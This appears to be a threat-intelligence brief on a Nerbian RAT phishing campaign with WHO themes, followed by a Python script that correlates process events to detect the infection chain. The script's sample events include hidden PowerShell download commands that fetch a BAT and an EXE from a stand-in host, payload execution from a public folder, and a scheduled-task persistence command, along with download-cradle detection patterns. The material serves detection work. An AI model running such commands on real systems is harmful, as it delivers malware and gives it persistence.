Phishing with World Health Organization Themes
Industry: N/A | Level: Tactical | Source: ProofPoint
Research from ProofPoint has identified distribution of the Nerbian remote access trojan (RAT) through phishing emails that use COVID-19 and World Health Organization themes. The campaign was traced back to a start on April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. Delivered emails contain either a malicious document or a compressed archive containing a malicious document. Upon execution of the embedded macro, the process flow is: CMD calls PowerShell to download a BAT file; the BAT file then launches PowerShell to download additional payloads, including the malicious RAT. The RAT establishes persistence and has the capability to download additional payloads as needed. There is currently no attribution for the Nerbian RAT.
Anvilogic Scenario:
- Nerbian RAT Infection Chain from Malicious Document
Anvilogic Use Cases:
- Malicious Document Execution
- Compressed File Execution
- Suspicious Executable by CMD.exe
- Executable Create Script Process
- Invoke-WebRequest Command
- Executable File Written to Disk
- Suspicious Executable by Powershell
- Executable Process from Suspicious Folder
- Network Connection with Suspicious Folder
- Create/Modify Schtasks
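The infection chain above (Office macro, CMD, PowerShell download cradle, payload run from a user-writable folder, scheduled-task persistence) is the kind of sequence the use cases listed are meant to stitch together. The following Python script is an added illustration of that correlation logic, not ProofPoint's research code and not an Anvilogic detection; it runs over constructed process-creation events. Host names, timestamps, file paths, the `example.invalid` URLs and the stage names are all assumptions made for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Stage names follow the chain in the brief: macro -> CMD -> PowerShell download
# -> payload executed from a user-writable folder -> scheduled task created.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SUSPICIOUS_DIRS = re.compile(r"(?i)\\(users\\public|appdata\\local\\temp|programdata)\\")
DOWNLOAD_CRADLE = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadfile|downloadstring")
STAGE_RANK = {"office_spawns_shell": 0, "powershell_download": 1,
              "exec_from_suspicious_dir": 2, "schtasks_create": 3}


@dataclass(frozen=True)
class ProcEvent:
    host: str
    ts: int        # event time in seconds (constructed values below)
    parent: str    # parent process image name
    image: str     # full path of the newly created process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def stage_of(e: ProcEvent):
    """Return the chain stage a single event matches, or None."""
    parent, image = e.parent.lower(), basename(e.image)
    if parent in OFFICE_APPS and image in SHELLS:
        return "office_spawns_shell"
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(e.cmdline):
        return "powershell_download"
    if image == "schtasks.exe" and re.search(r"(?i)/create", e.cmdline):
        return "schtasks_create"
    if image.endswith(".exe") and SUSPICIOUS_DIRS.search(e.image):
        return "exec_from_suspicious_dir"
    return None


def correlate(events, window=900, min_stages=3):
    """Per host, anchor on the first Office-spawns-shell event and collect the
    distinct stages seen within `window` seconds of it. A host is alerted when
    at least `min_stages` distinct stages occur; single stages stay silent so
    an administrator's interactive download does not fire on its own."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda x: x.ts):
        s = stage_of(e)
        if s:
            by_host[e.host].append((e.ts, s))
    alerts = {}
    for host, hits in by_host.items():
        starts = [ts for ts, s in hits if s == "office_spawns_shell"]
        if not starts:
            continue
        t0 = starts[0]
        stages = {s for ts, s in hits if t0 <= ts <= t0 + window}
        if len(stages) >= min_stages:
            alerts[host] = sorted(stages, key=STAGE_RANK.get)
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # ws01: the full chain
    ProcEvent("ws01", 1000, "winword.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -w hidden -c "Invoke-WebRequest http://example.invalid/s.bat -OutFile C:\\Users\\Public\\s.bat"'),
    ProcEvent("ws01", 1002, "cmd.exe", PS,
              'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/s.bat -OutFile C:\\Users\\Public\\s.bat"'),
    ProcEvent("ws01", 1005, "cmd.exe", PS,
              'powershell -c "Invoke-WebRequest http://example.invalid/p.exe -OutFile C:\\Users\\Public\\p.exe"'),
    ProcEvent("ws01", 1010, "powershell.exe", r"C:\Users\Public\p.exe", r"C:\Users\Public\p.exe"),
    ProcEvent("ws01", 1012, "p.exe", r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /sc minute /mo 5 /tn "Update" /tr C:\\Users\\Public\\p.exe'),
    # ws02: an administrator's interactive download, one stage only
    ProcEvent("ws02", 2000, "explorer.exe", PS,
              'powershell -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\Tools\\tool.zip"'),
    # ws03: Word launching a harmless cmd helper, one stage only
    ProcEvent("ws03", 3000, "winword.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo done"),
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Only `ws01` is reported, with all four stages in chain order; the two single-stage hosts are left alone. In a real pipeline each `stage_of` branch would map to one of the use cases above, and the per-host time window is what turns those atomic detections into the scenario-level alert.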